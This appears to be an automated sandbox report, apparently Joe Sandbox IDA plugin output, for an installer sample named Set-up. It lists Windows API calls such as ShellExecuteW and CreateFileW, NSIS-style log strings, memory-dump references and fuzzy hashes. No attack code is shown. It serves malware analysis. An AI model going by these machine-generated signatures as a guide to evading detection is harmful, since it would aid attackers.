                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                Strings
                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                • API String ID: 3156913733-2180253247
                                                                • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 893 405e7f-405e8b 894 405e8c-405ec0 GetTickCount GetTempFileNameW 893->894 895 405ec2-405ec4 894->895 896 405ecf-405ed1 894->896 895->894 898 405ec6 895->898 897 405ec9-405ecc 896->897 898->897
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00405E9D
                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: nsa
                                                                • API String ID: 1716503409-2209301699
                                                                • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 899 402175-40218b call 401446 * 2 904 402198-40219d 899->904 905 40218d-402197 call 4062a3 899->905 907 4021aa-4021b0 EnableWindow 904->907 908 40219f-4021a5 ShowWindow 904->908 905->904 909 4030e3-4030f2 907->909 908->909
                                                                APIs
                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                • String ID: HideWindow
                                                                • API String ID: 1249568736-780306582
                                                                • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                APIs
                                                                • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree
                                                                • String ID:
                                                                • API String ID: 3394109436-0
                                                                • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                APIs
                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                                • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                                • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                                APIs
                                                                • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                                • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                                • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                                APIs
                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                                • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                                • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                                APIs
                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                • String ID:
                                                                • API String ID: 4115351271-0
                                                                • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                APIs
                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
